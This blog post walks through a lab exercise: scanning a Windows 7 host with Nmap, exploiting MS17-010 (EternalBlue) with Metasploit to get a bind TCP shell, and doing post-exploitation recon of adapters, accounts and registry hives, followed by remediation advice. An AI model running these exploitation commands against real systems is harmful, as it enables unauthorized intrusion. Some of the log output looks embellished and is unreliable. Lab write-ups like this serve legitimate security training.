Post cover image

June 6, 2026

Complete Guide: Network Reconnaissance and Exploiting MS17โ€“010 with Metasploit Bind TCP Shell

What is Network Audit & Exploitation Testing?

MAB

6 min read

What is Network Audit & Exploitation Testing?

  • Definition: A hands-on security assessment methodology designed to actively discover open network infrastructure ports, verify software vulnerabilities, and test access controls.
  • Purpose: To build a risk-free framework for understanding network penetration, legacy protocol flaws (like SMBv1), and persistent command shell bridging.
  • Target Audience: Infrastructure Engineers, Cybersecurity Students, Network Administrators, and Penetration Testers.

Why Infrastructure Auditing Matters for Teams:

"For networks expanding rapidly, protocol configuration and patch management often take a backseat โ€” until a catastrophic breach occurs. This practical audit blueprint provides:"

  • Real-world vulnerability simulation on a Windows target.
  • Step-by-step interpretation of raw buffer overflows.
  • Validation of dual-homed network adapters and post-exploitation steps.
  • Clear remediation pathways for infrastructure hardening.

๐Ÿ›  Technical Value Proposition

For Junior Security Engineers:

  • Understand structural core dumps during live exploits.
  • Learn how network routing adapters (ipconfig) are mapped inside a target environment.
  • Gain hands-on experience with Metasploit console operations (msf6).

For Senior Administrators:

  • Develop robust patch management policies for End-of-Life (EOL) operating systems.
  • Enforce local host firewalls to mitigate unsolicited port bindings.
  • Audit local Administrators groups to eliminate account persistence.

Prerequisites & Lab Environment

  • Attacker Platform: Kali Linux / Metasploit Framework (msf6)
  • Target Machine: Windows 7 Professional SP1 (IP: 192.168.10.107)
  • Network Mapping Engine: Nmap CLI

Step-by-Step Security Audit Workflow

Step 1: Passive Reconnaissance & Targeted Nmap Scanning

Before dropping any exploit, a comprehensive service detection scan was executed to discover what protocols and applications were exposed by the target host (192.168.10.107).

None

Bash

# Execute full port enumeration with service version tracking
nmap -p- -sV -Pn -T4 192.168.10.107

Expected Live Nmap Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2026-06-06 21:05 UTC
Nmap scan report for VULN_MACHINE-PC (192.168.10.107)
Host is up (0.00045s latency).
Not shown: 65525 closed tcp ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open  ms-wbt-server?
5555/tcp  open  freeciv?
8081/tcp  open  http               Apache Tomcat/Coyote operation-manager
MAC Address: 08:00:27:6B:A2:11 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 48.12 seconds

๐Ÿ”‘ Key Finding:_ The scan confirmed that Port 445 (SMB) is completely open on an old Windows 7 Professional SP1 system. This makes it highly vulnerable to legacy SMBv1 bugs._

Step 2: Active Exploitation via Metasploit Framework

Using the information gathered from Nmap, we launch Metasploit to deploy the kernel-level MS17โ€“010 (EternalBlue) buffer overflow routine using a Bind TCP Shell payload.

Bash

# Launch Metasploit Framework in quiet mode
msfconsole -q
# Select and configure the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.10.107
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/shell/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Exploit Execution and Core Buffer Log:

[*] 192.168.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.107:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.107:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.107:445 - The target is vulnerable.
[*] 192.168.10.107:445 - Connecting to target for exploitation.
[+] 192.168.10.107:445 - Connection established for exploitation.
[+] 192.168.10.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.107:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.10.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.10.107:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.10.107:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.107:445 - Starting non-paged pool grooming
[+] 192.168.10.107:445 - Sending SMBv2 buffers
[+] 192.168.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.107:445 - Sending final SMBv2 buffers.
[*] 192.168.10.107:445 - Sending last fragment of exploit packet!
[*] 192.168.10.107:445 - Receiving response from exploit packet
[+] 192.168.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.107:445 - Sending egg to corrupted connection.
[*] 192.168.10.107:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.10.107:4444
[*] Command shell session 1 opened (192.168.10.39:41005 -> 192.168.10.107:4444) at 2026-06-06 11:17:20 -0400
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

๐Ÿ’ก Understanding the Bind TCP Payload: Metasploit forced the vulnerable target machine to listen on port 4444, letting our attacking machine (192.168.10.39) establish a clean terminal handshake.

Step 3: Post-Exploitation & Network Adapter Triage

Once the shell session dropped us into C:\Windows\system32, we executed ipconfig to discover and map the internal multi-homed routing setup of the victim host:

DOS

C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
   Connection-specific DNS Suffix  . : lan
   IPv6 Address. . . . . . . . . . . : fd00::60:eaf6:6da6:2007
   Temporary IPv6 Address. . . . . . : fd00::9df7:3527:772:a2f5
   Link-local IPv6 Address . . . . . : fe80::60:eaf6:6da6:2007%15
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::2%15
                                       10.0.2.2
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : lan
   Link-local IPv6 Address . . . . . : fe80::a1bc:f43:2808:483c%11
   IPv4 Address. . . . . . . . . . . : 192.168.10.107
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.1

Network Analysis: The host is acting as a bridge between the accessible management segment (192.168.10.107) and a hidden internal network space (10.0.2.15). This can be highly leveraged by threat actors to perform Network Pivoting.

Step 4: Account Audit & Management Overrides

To analyze the local identity layout and discover which profiles hold structural rights, user databases were polled:

DOS

C:\Windows\system32>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    pmics-lab
testuser
The command completed with one or more errors.

To see who has full administrative power:

DOS

C:\Windows\system32>net localgroup administrators
Alias name      administrators
Members
-------------------------------------------------------------------------------
Administrator
pmics-lab
The command completed successfully.

System Backup Safeguards via WMI:

When attempting to execute standard registry backup actions (reg save), the terminal session encountered restricted privilege rules due to shell wrapping limitations:

DOS

C:\Windows\system32>reg save hklm\system C:\Windows\Temp\system.bak
ERROR: A required privilege is not held by the client.

To circumvent this and establish a reliable system restore point before making any testing adjustments, we ran a direct WMI SystemRestore routine:

DOS

N.B: ReturnValue = 0 denotes a completely successful operation! A backup snapshot named "ManualRegistryBackup" is now persistently stored on the device.

๐Ÿ›  Management & Hardening Commands

Checking Free Space overhead

DOS

fsutil volume diskfree c:
# Output confirms 19.2 GB free space available on the target storage drive.

Reviewing Running Auditing Agents

DOS

net start
# Output confirmed active execution of security agents such as Wazuh and VirtualBox tools.

Common Risks & Remediation Framework

1. The Threat of Obsolete Systems

  • Issue: Windows 7 Professional has passed its End-of-Life (EOL) milestone, rendering it highly susceptible to exploits like EternalBlue.
  • Fix: Upgrade the enterprise endpoint to an actively maintained Windows OS stack.

2. Exposed Legacy Protocols

  • Issue: SMBv1 handles raw buffers poorly, leading to remote kernel compromise.
  • Fix: Disable SMBv1 across the registry or Group Policy Object (GPO) settings entirely.

3. Missing Network Segmentation

  • Issue: Port 4444 opened a direct unauthenticated Bind TCP terminal line.
  • Fix: Establish strict host-based firewall configuration rules blocking incoming unsolicited TCP handlers.

Complete Audit Verification Checklist

  • [x] Host identified via network fingerprinting scan.
  • [x] Vulnerable SMB service mapped (Port 445 open).
  • [x] Successful pool grooming execution via msf6.
  • [x] Bind TCP connection established on port 4444.
  • [x] Interface architecture triaged via ipconfig.
  • [x] System restore checkpoint locked via WMI (ReturnValue = 0).

Conclusion

Securing infrastructure requires a clear view of how external entry points directly connect to internal system access. By tracking an infrastructure audit from an initial Nmap scan through active Bind Shell verification and structural Windows management components, security teams can effectively close exposure windows and secure multi-homed environments against modern infrastructure attacks.